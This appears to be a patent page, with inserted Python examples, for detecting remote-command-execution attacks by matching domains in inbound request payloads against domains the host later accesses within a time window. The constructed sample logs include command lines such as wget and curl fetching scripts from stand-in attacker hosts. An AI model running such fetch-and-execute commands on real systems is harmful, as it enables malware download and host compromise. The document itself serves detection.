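    for when, cmd in shell_records:
        for d in extract_domains(cmd):
            host_log.append(HostAccess(when, d, cmd))
    return host_log


def detect(net: RequestParams, host_log: list[HostAccess], host_ip: str,
           threshold: timedelta = timedelta(seconds=10)) -> Optional[dict]:
    """S103: alarm only if the host accessed a payload domain strictly after receiving
    the request and no later than `threshold` after it; otherwise return None."""
    for first_domain in net.domains:
        for access in host_log:
            if access.domain != first_domain:
                continue
            delta = access.accessed_at - net.received_at
            if timedelta(0) < delta <= threshold:
                return {
                    "first_domain": first_domain,
                    "host_ip": host_ip,
                    "dst_ip": net.dst_ip,
                    "payload": net.payload,
                    "log_record": access.record,
                    "delay_seconds": delta.total_seconds(),
                }
    return None


# Constructed sample data: one request received by the host and three shell records.
T0 = datetime(2022, 5, 7, 10, 0, 0)
SAMPLE_NET = build_network_log(
    received_at=T0,
    dst_ip="10.0.0.5",
    payload="GET /search?q=fetch+stage.attacker.example/setup HTTP/1.1",
)
SAMPLE_HOST_LOG = build_host_log([
    (T0 - timedelta(seconds=40), "apt-get update"),                       # no domain name
    (T0 - timedelta(seconds=20), "curl -s updates.vendor.example/list"),  # before the request
    (T0 + timedelta(seconds=3),  "curl -s stage.attacker.example/setup"), # 3 s after, within 10 s
])


def run_demo() -> Optional[dict]:
    """Run the matcher over the constructed sample; returns the alarm information."""
    return detect(SAMPLE_NET, SAMPLE_HOST_LOG, host_ip="10.0.0.5")


if __name__ == "__main__":
    print(run_demo())
```

With the constructed data, `run_demo()` returns an alarm carrying the payload, the destination IP, the host IP and the matching shell record. Passing `threshold=timedelta(seconds=2)` to `detect` returns `None` for the same logs, which is the trade-off the description discusses when choosing 10 seconds over 5 hours, and a host-log record that accessed the domain before the request arrived never alarms, which is the ordering check the description relies on.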
  • embodiments of the present application also provide corresponding devices.
  • FIG. 5 is a schematic structural diagram of a detection device provided by an embodiment of the present application.
  • the detection device is used to execute the attack detection method provided by the above method embodiment.
  • the detection device 500 shown in Figure 5 includes an acquisition module 501 and a processing module 502.
  • the detection device 500 shown in Figure 5 is applied to detection equipment. For this situation:
  • the acquisition module 501 is used to obtain the network log of the host.
  • the network log includes parameter information of a first request message.
  • the first request message is a request message received by the host from other devices.
  • the parameter information includes the first domain name included in the payload part of the first request message;
  • the acquisition module 501 is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host;
  • the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, and the alarm information is used to indicate that the host is attacked.
  • the parameter information also includes the time when the host receives the first request message, and the host log also includes the time corresponding to each domain name in the at least one domain name, wherein, the time corresponding to the second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
  • the processing module 502 is configured to generate the alarm information if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message.
  • the processing module 502 is configured to generate the alarm information if the at least one domain name includes the first domain name, the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message, and the difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request message is less than or equal to the preset time threshold.
  • the detection device is integrated into the host, and the acquisition module 501 is used to obtain the network log of the host by hooking a network function, and to obtain the host log of the host by hooking the shell execution process in the operating system.
  • the detection device is another independent computer device that has a network connection with the host.
  • the acquisition module 501 is configured to receive the network log sent by the security device, where the security device is deployed between the other device and the host, and to receive the host log sent by the host.
  • the detection device, the security device and the host are located in the same local area network.
  • the detection device is deployed on the Internet.
  • the processing module 502 is also configured to: output the alarm information.
  • the parameter information also includes the payload part and/or the destination Internet protocol (IP) address of the first request message, and the alarm information correspondingly includes the payload part and/or the destination IP address included in the parameter information.
  • the host log also includes the IP address of the host and/or log records corresponding to each domain name in the at least one domain name, and the alarm information correspondingly includes the IP address of the host and/or the log record corresponding to the first domain name included in the host log.
  • the detection device 500 shown in Figure 5 is integrated into the host. In this case:
  • the acquisition module 501 is used to obtain the network log of the host.
  • the network log includes parameter information of a first request message.
  • the first request message is a request message received by the host from other devices.
  • the parameter information includes the first domain name included in the payload part of the first request message;
  • the acquisition module 501 is also used to obtain the host log of the host, where the host log includes at least one domain name accessed by the host.
  • the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, and the alarm information is used to indicate that the host is attacked.
  • the acquisition module 501 is configured to acquire the network log of the host by hooking a network function, and acquire the host log of the host by hooking the shell execution process in the operating system.
  • the detection device 500 is a device corresponding to the attack detection method provided in the above method embodiments, and the specific implementation of each unit of the device 500 follows the same concept as the above method embodiments. Therefore, for the specific implementation of each unit of the device 500, refer to the description of the above method embodiment, which is not repeated here.
  • Figure 6 is a schematic structural diagram of a device provided by an embodiment of the present application.
  • the device 600 includes: a processor 610, a communication interface 620 and a memory 630.
  • the number of processors 610 in the device 600 may be one or more; in FIG. 6, one processor is taken as an example. In this embodiment of the present application, the processor 610, the communication interface 620 and the memory 630 may be connected through a bus system or by other means; in FIG. 6, connection through the bus system 640 is taken as an example.
  • the processor 610 may be a central processing unit (CPU), a network processor (NP), or a combination of CPU and NP.
  • the processor 610 may further include hardware chips.
  • the above-mentioned hardware chip can be an application-specific integrated circuit (ASIC), a programmable logic device (PLD) or a combination thereof.
  • the above-mentioned PLD can be a complex programmable logic device (CPLD), a field-programmable gate array (FPGA), a general array logic (GAL) or any combination thereof.
  • the memory 630 may include volatile memory, such as random-access memory (RAM); the memory 630 may also include non-volatile memory, such as flash memory, a hard disk drive (HDD) or a solid-state drive (SSD); the memory 630 may also include a combination of the above types of memory.
  • the memory 630 can store, for example, the network log of the host and the host log of the host.
  • the memory 630 stores an operating system and programs, executable modules or data structures, or a subset thereof, or an extended set thereof, where the program may include various operating instructions for implementing various operations.
  • the operating system may include various system programs that are used to implement various basic services and handle hardware-based tasks.
  • the processor 610 can read the program in the memory 630 to implement the attack detection method provided by the embodiment of the present application.
  • the bus system 640 may be a peripheral component interconnect (PCI) bus or an extended industry standard architecture (EISA) bus, etc.
  • the bus system 640 can be divided into an address bus, a data bus, a control bus, etc. For ease of presentation, only one thick line is used in Figure 6, but it does not mean that there is only one bus or one type of bus.
  • Embodiments of the present application also provide a computer-readable storage medium, which includes instructions or computer programs that, when run on a computer, cause the computer to execute the method for detecting attacks provided in the above embodiments.
  • Embodiments of the present application also provide a computer program product containing instructions or computer programs that, when run on a computer, cause the computer to execute the method for detecting attacks provided in the above embodiments.
  • the disclosed systems, devices and methods can be implemented in other ways.
  • the device embodiments described above are only illustrative.
  • the division into units is only a logical division by function; in actual implementation there may be other ways of dividing them.
  • multiple units or components may be combined or integrated into another system, or some features can be ignored or not implemented.
  • the coupling or direct coupling or communication connection between each other shown or discussed may be through some interfaces, and the indirect coupling or communication connection of the devices or units may be in electrical, mechanical or other forms.
  • a unit described as a separate component may or may not be physically separate.
  • a component shown as a unit may or may not be a physical unit, that is, it may be located in one place, or it may be distributed to multiple network units. Some or all of the units can be selected according to actual needs to achieve the purpose of the solution of this embodiment.
  • each business unit in various embodiments of this application may be integrated into one processing unit, or each unit may exist physically alone, or two or more units may be integrated into one unit.
  • the above integrated units can be implemented in the form of hardware or software business units.
  • if the integrated unit is implemented in the form of a software business unit and sold or used as an independent product, it can be stored in a computer-readable storage medium.
  • the technical solution of the present application, in essence or in the part that contributes to the existing technology, or all or part of the technical solution, can be embodied in the form of a software product stored in a storage medium, including several instructions that cause a computer device (which may be a personal computer, a server, or a network device, etc.) to execute all or part of the steps of the methods of the various embodiments of the present application.
  • the aforementioned storage media include: USB flash drive, removable hard disk, read-only memory (ROM), random access memory (RAM), magnetic disk or optical disk, and other media that can store program code.
  • Computer-readable media includes computer storage media and communication media including any medium that facilitates transfer of a computer program from one place to another.
  • Storage media can be any available media that can be accessed by a general purpose or special purpose computer.

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Mining & Analysis (AREA)
  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

In an attack detection method, a detection device acquires a network log of a host and a host log of the host, the network log of the host comprising parameter information of a first request message, the first request message being a request message received by the host from another device, the parameter information of the first request message comprising a first domain name included in a payload part of the first request message, and the host log of the host comprising at least one domain name accessed by the host; the detection device matches the first domain name with the at least one domain name; and, if the at least one domain name comprises the first domain name, the detection device generates alarm information used for indicating that the host is attacked. Hence, by combining the first domain name in the first request message and the at least one domain name accessed by the host, the present solution determines whether an attack on the host is successful, and generates alarm information only when the attack is successfully executed, thereby accurately detecting the attack on the host and avoiding a large number of false alarms.

Description

一种检测攻击的方法及装置A method and device for detecting attacks
本申请要求于2022年5月7日提交中国国家知识产权局、申请号为202210493521.X、申请名称为“一种检测攻击的方法及装置”的中国专利申请的优先权,其全部内容通过引用结合在本申请中。This application claims priority to the Chinese patent application filed with the State Intellectual Property Office of China on May 7, 2022, with application number 202210493521.X and application title "A method and device for detecting attacks", the entire content of which is incorporated by reference. incorporated in this application.
技术领域Technical field
本申请涉及信息安全领域,尤其涉及一种检测攻击的方法及装置。The present application relates to the field of information security, and in particular to a method and device for detecting attacks.
背景技术Background technique
攻击者通常会使用漏洞对主机进行入侵,一些漏洞允许攻击者直接在主机上执行***命令,是危害程度较高、被攻击者利用较为广泛的漏洞。这样的漏洞例如包括远程命令执行(Remote Command Execution,RCE)漏洞。针对这种攻击行为,传统技术通过人工分析漏洞的特征,编写出对应的检测规则,并将检测规则配置在防火墙等安全设备。安全设备基于检测规则对流经的流量进行特征匹配,如果匹配中则生成告警,以指示发生了攻击事件。Attackers usually use vulnerabilities to invade hosts. Some vulnerabilities allow attackers to directly execute system commands on the host. They are highly harmful vulnerabilities and are widely exploited by attackers. Such vulnerabilities include, for example, Remote Command Execution (RCE) vulnerabilities. In response to this kind of attack behavior, traditional technology manually analyzes the characteristics of vulnerabilities, writes corresponding detection rules, and configures the detection rules on security devices such as firewalls. The security device matches the characteristics of the traffic flowing through based on the detection rules. If there is a match, an alarm is generated to indicate that an attack event has occurred.
上述传统技术往往存在准确率较低的现象,如何准确的检测出攻击者基于上述漏洞而发起的攻击,是目前尚待解决的问题。The above-mentioned traditional technologies often have low accuracy. How to accurately detect attacks launched by attackers based on the above-mentioned vulnerabilities is a problem that has yet to be solved.
发明内容Contents of the invention
本申请实施例提供了一种检测攻击的方法及装置,能够准确地检测出基于特定类别的漏洞所发起的攻击。The embodiments of this application provide a method and device for detecting attacks, which can accurately detect attacks based on specific types of vulnerabilities.
In a first aspect, the embodiments of this application provide an attack detection method applied to a detection device. In one example, the detection device obtains a network log of a host and a host log of the host. The network log of the host includes parameter information of a first request message, the first request message being a request message that the host received from another device; the parameter information of the first request message includes a first domain name contained in the payload part of the first request message. The host log of the host includes at least one domain name accessed by the host. After obtaining the network log and the host log of the host, the detection device matches the first domain name included in the network log against the at least one domain name in the host log. If the at least one domain name in the host log includes the first domain name from the network log, this means that the host received the first request message containing the first domain name and that the host accessed the first domain name. In this case, the host is considered to have accessed the first domain name in the first request message on the basis of that request message. In other words, the host has the vulnerability that the attacker attempted to exploit through the first request message (a vulnerability of this category allows an attacker to execute system commands directly on the host), and the attack that the attacker launched against that vulnerability executed successfully. In this case, the detection device generates alarm information indicating that the host has been attacked. It can be seen that this solution combines the first domain name included in the first request message with the at least one domain name accessed by the host to determine whether the attack on the host succeeded, and generates alarm information only when the attack executed successfully. Correspondingly, if the at least one domain name in the host log does not include the first domain name from the network log, this means that although the attacker attempted to launch an attack by exploiting the vulnerability, the attack did not execute successfully, and no alarm is generated in this case. The solution therefore detects attacks against the host accurately and avoids generating a large number of false alarms.
In a possible implementation, the parameter information of the first request message further includes the time at which the host received the first request message. The host log of the host further includes a time corresponding to each of the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name. In this case, the detection device can determine more information related to the first request message from the network log of the host, and can determine from the host log the time at which the host accessed each of the at least one domain name.
In a possible implementation, to improve the accuracy of attack detection, when the network log received by the detection device includes the time at which the host received the first request message and the host log received by the detection device includes the time corresponding to each of the at least one domain name, the detection device, in addition to matching the first domain name against the at least one domain name, further determines, if the at least one domain name includes the first domain name, whether the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message. If the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the host received the first request message first and accessed the first domain name afterwards; in that case it is confirmed that the host has been attacked, and specifically that the attacker attacked the host by means of the first request message. In this case, the detection device generates the aforementioned alarm information indicating that the host has been attacked.
In a possible implementation, consideration is given to the fact that, for an attack message, there is a certain time difference between the time at which the host receives the attack message and the time at which the host accesses the domain name in the attack message, and that this time difference generally falls within a certain range. Therefore, in one example, after determining that the at least one domain name includes the first domain name and that the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the detection device further determines whether the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold. When this difference is less than or equal to the preset time threshold, it is determined that the host has been attacked, and specifically that the attacker attacked the host by means of the first request message. In this case, the detection device generates the aforementioned alarm information indicating that the host has been attacked.
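The matching described in the implementations above (a domain name taken from the payload of an inbound request is found among the domains the host accessed, the access is later than receipt of the request, and the difference is within a preset threshold), as an added Python example that is not part of the patent. The record layouts, the 10.0.0.5 address, the .test domains, the base time and the 60-second default threshold are constructed assumptions.

```python
"""Correlate a host's network log with its host log to confirm that an inbound
request actually led the host to contact the domain named in its payload.
Added example, not the patent's implementation; every log format, address and
domain below is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class NetLogEntry:
    """Parameter information of one inbound request (network log)."""
    received_at: datetime  # time the host received the request
    dst_ip: str            # destination IP of the request, i.e. the host
    payload: str           # payload part of the request
    domain: str            # first domain name found in the payload


@dataclass(frozen=True)
class HostLogEntry:
    """One domain access by the host (host log), e.g. from a shell hook."""
    accessed_at: datetime  # time the host accessed the domain
    host_ip: str
    domain: str
    record: str            # raw log record behind the access


@dataclass(frozen=True)
class Alarm:
    """Host, domain, both times, and the evidence from each log."""
    host_ip: str
    domain: str
    received_at: datetime
    accessed_at: datetime
    dst_ip: str
    payload: str
    record: str

# Simplified extractor: a dotted hostname, optionally behind an http(s) scheme.
# A real sensor would use its protocol parser; this shows where the domain comes from.
DOMAIN_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)

def extract_domain(payload: str) -> str | None:
    """Return the first domain name in a request payload, or None."""
    m = DOMAIN_RE.search(payload)
    return m.group(1).lower() if m else None

def net_entry(received_at: datetime, dst_ip: str, payload: str) -> NetLogEntry | None:
    """Build a network log entry; a request carrying no domain is dropped,
    because there is nothing in it to match against the host log."""
    domain = extract_domain(payload)
    return None if domain is None else NetLogEntry(received_at, dst_ip, payload, domain)

def correlate(net_log: list[NetLogEntry], host_log: list[HostLogEntry],
              threshold_s: float = 60.0) -> list[Alarm]:
    """Emit one alarm per inbound request whose payload domain the host accessed
    strictly after receiving the request and within threshold_s seconds.
    A request without such a host access is an unsuccessful attempt: no alarm."""
    by_domain: dict[str, list[HostLogEntry]] = {}
    for h in host_log:
        by_domain.setdefault(h.domain.lower(), []).append(h)
    alarms: list[Alarm] = []
    for n in net_log:
        for h in sorted(by_domain.get(n.domain, []), key=lambda e: e.accessed_at):
            delay = (h.accessed_at - n.received_at).total_seconds()
            if 0 < delay <= threshold_s:  # accessed after receipt, within the window
                alarms.append(Alarm(h.host_ip, n.domain, n.received_at, h.accessed_at,
                                    n.dst_ip, n.payload, h.record))
                break  # the first qualifying access settles this request
    return alarms

T0 = datetime(2024, 1, 1, 12, 0, 0)  # constructed base time
HOST = "10.0.0.5"                    # constructed host address

# Constructed network log: four inbound requests to the host.
SAMPLE_NET_LOG = [e for e in (
    net_entry(T0, HOST, "cmd=wget http://dl.attacker.test/m.sh"),
    net_entry(T0 + timedelta(seconds=10), HOST, "cmd=curl http://never-fetched.test/x"),
    net_entry(T0 + timedelta(seconds=20), HOST, "ref=updates.vendor.test"),
    net_entry(T0 + timedelta(seconds=30), HOST, "id=42"),  # no domain: dropped
) if e is not None]

# Constructed host log: what the host itself went on to access.
SAMPLE_HOST_LOG = [
    HostLogEntry(T0 + timedelta(seconds=3), HOST, "dl.attacker.test",
                 "wget http://dl.attacker.test/m.sh"),  # 3 s after the request: alarm
    HostLogEntry(T0 - timedelta(minutes=5), HOST, "updates.vendor.test",
                 "apt-get update"),                     # before the request: no alarm
    HostLogEntry(T0 + timedelta(hours=2), HOST, "updates.vendor.test",
                 "apt-get update"),                     # outside the window: no alarm
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_NET_LOG, SAMPLE_HOST_LOG):
        delay = (a.accessed_at - a.received_at).total_seconds()
        print(f"ALARM host={a.host_ip} domain={a.domain} delay={delay:.0f}s "
              f"payload={a.payload!r} record={a.record!r}")
```

Only the first request produces an alarm: the second domain is never accessed, and the third is accessed either before the request or long after the window, which is exactly the ordering and threshold check that keeps a signature-only match from becoming a false alarm.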
In a possible implementation, the aforementioned detection device is integrated into the host. In this case, the detection device obtaining the network log of the host means that the host obtains its own network log. In one example, the host obtains its network log by hooking network functions. Correspondingly, the detection device obtaining the host log of the host means that the host obtains its own host log. In one example, the host obtains its own host log by hooking the shell execution process in the operating system.
In a possible implementation, the detection device is a separate, independent computer device that has a network connection to the host. In this case, the detection device obtains the network log of the host as follows: the detection device receives the network log sent by a security device, the security device being deployed between the other device and the host. Correspondingly, the detection device obtains the host log of the host as follows: the detection device receives the host log sent by the host.
In a possible implementation, when the detection device is a separate, independent computer device with a network connection to the host, the detection device, the security device and the host are located in the same local area network. In this case, the host and the security device can access the detection device, while other devices outside the local area network cannot.
In a possible implementation, the detection device is deployed on the Internet. In this case, the host and the security device can access the detection device, and other devices can access it as well.
In a possible implementation, after generating the alarm information, the detection device further outputs the alarm information, so that operation and maintenance personnel or another device (for example, a management device) can determine that the host has been attacked and take corresponding measures.
In a possible implementation, so that the operation and maintenance personnel or the management device can learn more about the attack message, the alarm information further includes additional information related to the first request message. As an example, if the parameter information of the first request message in the network log obtained by the detection device further includes the payload part of the first request message and/or the destination IP address of the first request message, the alarm information correspondingly also includes the payload part and/or the destination IP address of the first request message contained in the parameter information. In yet another example, the host log obtained by the detection device further includes the IP address of the host and/or a log record corresponding to each of the at least one domain name. In this case, the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name contained in the host log.
In a possible implementation, the first request message is a transmission control protocol (TCP) request message. In this case, the solution can accurately determine whether an attack on the host using a TCP request message succeeded, and generates alarm information only when the attack executed successfully.
In a second aspect, the embodiments of this application provide an attack detection system. The system includes a security device, a host and a detection device. The security device is configured to send a network log of the host to the detection device, the network log including parameter information of a first request message, the first request message being a message that the host received from another device, and the parameter information including a first domain name contained in the payload part of the first request message. The host is configured to send a host log of the host to the detection device, the host log including at least one domain name accessed by the host. The detection device is configured to receive the network log sent by the security device and the host log sent by the host and, when the at least one domain name includes the first domain name, to generate alarm information indicating that the host has been attacked. This solution combines the first domain name included in the first request message with the at least one domain name accessed by the host to determine whether the attack on the host succeeded, and generates alarm information only when the attack executed successfully. Correspondingly, if the at least one domain name in the host log does not include the first domain name from the network log, this means that although the attacker attempted to launch an attack by exploiting the vulnerability, the attack did not execute successfully, and no alarm is generated in this case. The solution therefore detects attacks against the host accurately and avoids generating a large number of false alarms.
In a possible implementation, the parameter information further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each of the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name.
In a possible implementation, the detection device is configured to generate the alarm information when the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
In a possible implementation, the detection device is configured to generate the alarm information when the at least one domain name includes the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold.
In a possible implementation, the host obtains the host log of the host by hooking the shell execution process in the operating system.
In a possible implementation, the detection device, the security device and the host are located in the same local area network.
In a possible implementation, the detection device is deployed on the Internet.
In a possible implementation, the detection device is further configured to output the alarm information.
In a possible implementation, the parameter information further includes the payload part and/or the destination Internet Protocol (IP) address of the first request message, and the alarm information includes the payload part and/or the destination IP address of the first request message contained in the parameter information.
In a possible implementation, the host log further includes the IP address of the host and/or a log record corresponding to each of the at least one domain name, and the alarm information includes the IP address of the host and/or the log record corresponding to the first domain name contained in the host log.
In a possible implementation, the first request message is a TCP-based request message.
In a third aspect, the embodiments of this application provide a detection apparatus integrated into a host. The detection apparatus includes an acquisition module configured to obtain a network log of the host, the network log including parameter information of a first request message, the first request message being a request message that the host received from another device, and the parameter information including a first domain name contained in the payload part of the first request message; the acquisition module is further configured to obtain a host log of the host, the host log including at least one domain name accessed by the host; and a processing module configured to generate alarm information indicating that the host has been attacked if the at least one domain name includes the first domain name.
In a possible implementation, the acquisition module is configured to obtain the network log of the host by hooking network functions, and to obtain the host log of the host by hooking the shell execution process in the operating system.
In a fourth aspect, the embodiments of this application provide a detection apparatus applied to a detection device. The apparatus includes an acquisition module configured to obtain a network log of a host, the network log including parameter information of a first request message, the first request message being a request message that the host received from another device, and the parameter information including a first domain name contained in the payload part of the first request message; the acquisition module is further configured to obtain a host log of the host, the host log including at least one domain name accessed by the host; and a processing module configured to generate alarm information if the at least one domain name includes the first domain name, the alarm indicating that the host has been attacked.
In a possible implementation, the parameter information further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each of the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name.
In a possible implementation, where the at least one domain name includes the first domain name, the processing module is configured to generate the alarm information if the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
In a possible implementation, where the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the processing module is configured to generate the alarm information if the at least one domain name includes the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the time corresponding to the first domain name in the host log and the time at which the host received the first request message is less than or equal to a preset time threshold.
In a possible implementation, the detection device is integrated into the host, and the acquisition module is configured to obtain the network log of the host by hooking network functions, and to obtain the host log of the host by hooking the shell execution process in the operating system.
In a possible implementation, the detection device is a separate, independent computer device with a network connection to the host, and the acquisition module is configured to receive the network log sent by a security device, the security device being deployed between the other device and the host, and to receive the host log sent by the host.
In a possible implementation, the detection device, the security device and the host are located in the same local area network.
In a possible implementation, the detection device is deployed on the Internet.
In a possible implementation, the processing module is further configured to output the alarm information.
In a possible implementation, the parameter information further includes the payload part and/or the destination Internet Protocol (IP) address of the first request message, and the alarm information further includes the payload part and/or the destination IP address of the first request message contained in the parameter information.
In a possible implementation, the host log further includes the IP address of the host and/or a log record corresponding to each of the at least one domain name, and the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name contained in the host log.
In a fifth aspect, the embodiments of this application provide a device. The device includes a processor and a memory. The memory is configured to store instructions or a computer program. The processor is configured to execute the instructions or computer program in the memory so as to perform the method according to any one of the implementations of the first aspect above.
In a sixth aspect, the embodiments of this application provide a computer-readable storage medium including instructions or a computer program which, when run on a computer, cause the computer to perform the method according to any one of the implementations of the first aspect above.
In a seventh aspect, the embodiments of this application provide a computer program product containing instructions or a computer program which, when run on a computer, cause the computer to perform the method according to any one of the implementations of the first aspect above.
Description of the drawings
To illustrate the technical solutions in the embodiments of this application or in the prior art more clearly, the drawings needed in the description of the embodiments or the prior art are briefly introduced below. Obviously, the drawings described below show only some embodiments of this application; a person of ordinary skill in the art can derive other drawings from them without creative effort.
Figure 1 is a schematic diagram of the process of launching an attack using a specific category of vulnerabilities in an exemplary application scenario;
Figure 2a is a schematic diagram of an exemplary application scenario provided by an embodiment of this application;
Figure 2b is a schematic diagram of another exemplary application scenario provided by an embodiment of this application;
Figure 2c is a schematic diagram of yet another exemplary application scenario provided by an embodiment of this application;
Figure 3 is a schematic flowchart of an attack detection method provided by an embodiment of this application;
Figure 4 is a signalling interaction diagram of an attack detection method provided by an embodiment of this application;
Figure 5 is a schematic structural diagram of a detection apparatus provided by an embodiment of this application;
Figure 6 is a schematic structural diagram of a device provided by an embodiment of this application.
Detailed description
The embodiments of this application provide an attack detection method and apparatus that can improve the accuracy of detecting attacks launched by exploiting a specific category of vulnerabilities. The specific category of vulnerabilities includes vulnerabilities that allow an attacker to execute system commands directly on a host.
For ease of understanding, the attacks launched using the above specific category of vulnerabilities are first briefly introduced with reference to the drawings.
Refer to Figure 1, a schematic diagram of the process of launching an attack using a specific category of vulnerabilities. The attacker sends the host an attack message containing an attack command; in one example, the attack command downloads malware stored on domain name A to the host and executes it locally. Optionally, the attack message is a TCP request message.
After the vulnerable service on the host receives the attack message, exploitation of the vulnerability is triggered; the vulnerable service then calls a function in the host's operating system to execute the attack command in the attack message. Further, the operating system sends an access request to domain name A, downloads the malware stored in a file directory on domain name A to the host, and executes the malware on the host.
Against the attack behaviour shown in Figure 1, conventional techniques analyse the characteristics of vulnerabilities manually, write corresponding detection rules, and configure those rules on security devices such as firewalls. The security device performs signature matching on the traffic passing through it according to the detection rules and, on a match, generates an alarm indicating that an attack event has occurred. For example, in the scenario shown in Figure 1, the security device is deployed between the attacker and the host; when the attacker sends the attack message to the host, the security device performs signature matching on the attack message. Alternatively, the security device is deployed between the host and the device corresponding to domain name A; when the host sends an access request to domain name A, the security device performs signature matching on that access request. Similarly, when the host downloads malware from a file directory on domain name A, the security device performs signature matching on the traffic carrying the malware.
However, on the one hand, because the aforementioned detection rules are derived from the characteristics of vulnerabilities, and vulnerabilities are numerous and of many kinds, analysts cannot analyse every vulnerability one by one; if an attacker launches an attack using a vulnerability that analysts have not yet analysed, the security device cannot detect that attack. At present, the interval between a vulnerability being discovered and an attacker exploiting it is growing ever shorter; for example, for more and more vulnerabilities, less than one day passes between discovery and exploitation. Such a vulnerability is also called a "zero-day vulnerability", and the corresponding attack a zero-day attack: a security vulnerability that is maliciously exploited immediately after being discovered. Such attacks tend to be highly sudden and destructive.
On the other hand, in some scenarios the host receives the attack message but does not execute the attack command it contains, that is, the attacker does not succeed. In this case, a security device deployed between the attacker and the host, after performing signature matching on the traffic according to the detection rules, still generates an alarm because it detected the attack message, resulting in a false alarm.
To solve the above problems, the embodiments of this application provide an attack detection method that can more accurately detect attacks launched by an attacker against a host on the basis of the above specific category of vulnerabilities, and that can also reduce false alarms.
Before introducing the attack detection method and system provided by the embodiments of this application, the application scenarios of the method are first introduced.
Refer to Figure 2a, a schematic diagram of an exemplary application scenario provided by an embodiment of this application. In the scenario shown in Figure 2a, host 101 is connected to the network through other network devices, and attack messages sent by the attacker are forwarded to host 101 through those network devices (such as switches and routers). A host agent runs on host 101, and a network log acquisition module and a host log acquisition module run on the host agent. Host 101 uses the network log acquisition module to obtain its network log and the host log acquisition module to obtain its host log, and determines from the network log and the host log whether the host has been attacked.
The host agent is a component running on the host. In one example, the host agent is a host intrusion detection system (HIDS) agent; in another example, it is a network intrusion detection system (NIDS) agent.
Refer to Figure 2b, a schematic diagram of another exemplary application scenario provided by an embodiment of this application. In the scenario shown in Figure 2b, host 102 is connected to the network through security device 103, and attack packets sent by an attacker are forwarded to host 102 through security device 103. Optionally, one or more network forwarding devices, such as routers or security gateways, sit between the attacker and the security device. Host 102 and security device 103 also interact with comprehensive analysis device 104.
A host agent runs on host 102, and a host log acquisition module runs on the host agent. Host 102 uses the host log acquisition module to obtain its host log and sends the host log to comprehensive analysis device 104. Security device 103 includes a network log acquisition module, uses it to obtain the network log of host 102, and sends the network log to comprehensive analysis device 104. Comprehensive analysis device 104 determines, based on the received network log and host log, whether the host has been attacked. Here, host 102, security device 103 and comprehensive analysis device 104 are located in the same local area network. In this case, host 102 and security device 103 access comprehensive analysis device 104 through the Internet Protocol (IP) address of comprehensive analysis device 104, which is pre-configured on host 102 and security device 103. When host 102, security device 103 and comprehensive analysis device 104 are in the same local area network, devices outside that local area network cannot access comprehensive analysis device 104.
This application does not limit the protocol used for data exchange between host 102 and comprehensive analysis device 104; the protocols include but are not limited to TCP and the hypertext transfer protocol (HTTP). Similarly, the protocols used for data exchange between security device 103 and comprehensive analysis device 104 include but are not limited to TCP and HTTP. The data exchanged between host 102 and comprehensive analysis device 104 includes the host log mentioned above, and the data exchanged between security device 103 and comprehensive analysis device 104 includes the network log mentioned above.
The comprehensive analysis device 104 mentioned here is, for example, a device running extended detection and response (XDR) software, or a device running security information and event management (SIEM) software.
Refer to Figure 2c, a schematic diagram of yet another exemplary application scenario provided by an embodiment of this application. In the scenario shown in Figure 2c, host 102 is connected to the network through security device 103, and attack packets sent by an attacker are forwarded to host 102 through security device 103. Host 102 and security device 103 also interact with cloud analysis device 105.
A host agent runs on host 102, and a host log acquisition module runs on the host agent. Host 102 uses the host log acquisition module to obtain its host log and sends the host log to cloud analysis device 105. Security device 103 includes a network log acquisition module, uses it to obtain the network log of host 102, and sends the network log to cloud analysis device 105. Cloud analysis device 105 determines, based on the received network log and host log, whether the host has been attacked. Here:
Host 102 and security device 103 are located in the same local area network, while cloud analysis device 105 is deployed on the Internet. In this case, cloud analysis device 105 provides a subscription service, and any other device, such as host 102 or security device 103, accesses this subscription service through a uniform resource locator (URL), a web application programming interface (API), or a domain name.
This application does not limit the protocol used for data exchange between host 102 and cloud analysis device 105; the protocols include but are not limited to TCP, HTTP and hypertext transfer protocol over secure socket layer (HTTPS). Similarly, the protocols used for data exchange between security device 103 and cloud analysis device 105 include but are not limited to TCP, HTTP and HTTPS. The data exchanged between host 102 and cloud analysis device 105 includes the host log mentioned above, and the data exchanged between security device 103 and cloud analysis device 105 includes the network log mentioned above.
